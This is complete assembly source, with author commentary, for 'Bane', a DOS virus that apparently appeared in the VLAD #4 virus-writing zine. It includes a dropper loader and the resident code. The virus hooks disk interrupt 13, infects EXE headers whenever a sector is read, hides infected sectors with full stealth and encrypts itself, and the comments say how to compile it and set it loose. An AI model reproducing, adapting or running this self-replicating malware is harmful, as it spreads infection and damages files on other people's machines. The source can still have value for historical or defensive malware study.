;
; "Bane" - by Quantum [VLAD]
;
; Summary: This is an Exe Header virus that has
; int 13 infection and full stealth
; oh.. and just a little encryption :)
;
; Details: The virus code is a mere 256 bytes so it is optimised to shit,
; and squeezed into the exe header at offset 100h .. the cs:ip is then
; pointed to this code and the header length shortened by 100h bytes..
; once we have execution the resident code is shoved in above the int
; table at 20:0 and int 13 pointed to it.. after restoring all the reg's
; we jump to ALMOST the original cs:ip.. (cs+10h:ip) where the host goes
; on its way none the wiser.. as for the resident routine.. you may be
; thinking all those pushes and pops are unnecessary.. you're wrong..
; we check for a sector read.. if found we look to see if it's an exe and
; if it's infected (tag: 10000000 in offset 12h) if not we infect it.. if
; so we full stealth it .. after infecting it we re-write the sector (see
; notes below) and then full stealth the sector we just infected!
;
; Testing/Compiling: This is a dropper written in A86.. make yourself
; a little test executable called funnily enough "Test.exe" then compile
; and run this source.. The test exe is now infected.. run it and any
; read on a exe (including execute/streams/FCB's/etc) will infect that
; exe.. but you won't know about it.. 'cause the "clean" sector will be
; passed back to the reader.. The virus installation code will never
; be run twice.. therefore there is no need for a residency checker..
;
; Known/Possible Bugs: Does not check to see if the exe header is standard
; and thus will overwrite the bottom half of pklited exe headers..
; also smart drive (bah!) has a habit of caching it's write to sectors and
; not acknowledging them.. thus the full stealth still works when smartdrv
; is running but no more files will be infected.. to make matters worse..
; even if you turn off write caching smartdrv still screws around with the
; writes.. them's the breaks..
;
; Dedication: This virus is dedicated to a loser I used to know.. this guy
; was so lame he faked a robbery on his own house as an insurance scam and
; stashed his puter at a mates place. When it went sour and the insurance
; wouldnt pay him (like usual) he accused his friend of stealing his
; computer and ran to the cops.. a few months later they all went to court
; and my friend proved his innocence and the loser got charged with fraud
; and the judge awarded my friend the computer as compensation.
; -------------- This is the Loader (Just Ignore it) -----------------------
mov ax,virend-virstart ; I use this to keep my code under 100h bytes
push cs
push cs
pop ds
pop es
mov ax,03d02h
mov dx,offset fname
int 21h
xchg bx,ax
mov ah,3fh
mov si,offset buffer
mov dx,si
mov cx,200h
int 21h
push si
add si,14h
mov di,offset nip
movsw
movsw
add word [di-2],10h
pop si
sub word [si+8h],10h
mov word [si+12h],10h
push si
mov di,si
add di,14h
xor ax,ax
stosw
stosw
add di,100h - 18h
mov si,offset virstart
mov cx,virend-virstart
rep movsb
pop si
mov ax,04200h
xor cx,cx
cwd
int 21h
mov ah,40h
mov cx,200h
mov dx,si
int 21h
mov ah,3eh
int 21h
int 20h
; --------------- Virus starts here (Pay Attention) ------------------------
virstart:
push ax
push cs
push cs
pop ds
pop es
mov di,encstart-virstart
call encdecrypt
jmp encstart
encbyte: db 0
encdecrypt:
mov ah,[encbyte-virstart]
mov si,encstart-virstart
mov cx,100h-(encstart-virstart)
encloop:
lodsb
xor al,ah
stosb
loop encloop
ret
nip dw 0000h ; new ip
ncs dw 0000h ; new cs
encstart:
in al,40h
mov [encbyte-virstart],al
mov ds,cx
mov si,013h * 4
push si
mov di,offset old13i - virstart
movsw
movsw
push ds
pop es
pop di
mov ax,offset newint13 - virstart
stosw
mov ax,020h
stosw
push cs
pop ds
xor si,si
mov di,200h
mov cx,0100h
rep movsb
push cs
pop ax
add [offset ncs - virstart],ax
mov ah,0dh
int 21h
pop ax
xor dx,dx
jmp dword ptr cs:[nip-virstart]
db "[Bane]"
newint13:
cmp ah,2
jz infect
db 0eah
old13i dw 0
old13s dw 0
infect:
push si
push di
push ds
push cx
push es
push bx
push ax
pushf
call dword ptr cs:[offset old13i-virstart]
mov cs:[orgax-virstart],ax
jc nogood
jmp tisok
nogood2me: clc
nogood:
pop ax
pop bx
pop es
pop cx
pop ds
pop di
pop si
mov ax,cs:[orgax-virstart]
retf 2
tisok:
cld
push es
pop ds
cmp word ptr [bx],"ZM"
jnz nogood2me
mov ax,10h
cmp word ptr [bx+12h],ax
jz dostealth
mov word ptr [bx+12h],ax
push cs
pop es
lea si,[bx + 14h]
push si
mov di,offset nip - virstart
add word ptr [si+2],ax
movsw
movsw
sub word ptr [bx+8h],ax
push ds
pop es
pop di
xor ax,ax
stosw
stosw
push cs
pop ds
xor si,si
lea di,[bx+100h]
mov cx,encstart-virstart
rep movsb
call encdecrypt
pop ax
pop bx
pop es
pop cx
push cx
push es
push bx
push ax
mov ah,3
pushf
call dword ptr [offset old13i - virstart]
push es
pop ds
dostealth:
push ds
pop es
lea si,[bx+ (offset nip - virstart)+100h]
lea di,[bx+14h]
mov ax,10h
sub word ptr [si+2],ax
movsw
movsw
add word ptr [bx+8h],ax
xor ax,ax
mov si,100h
lea di,[bx+si]
xchg cx,si
rep stosb
jmp nogood2me
orgax:
virend:
; ------------------------ End of Virus ------------------------------------
fname db "test.exe",0
buffer:
; ------------------------ End of Loader -----------------------------------
- VLAD #4 INDEX -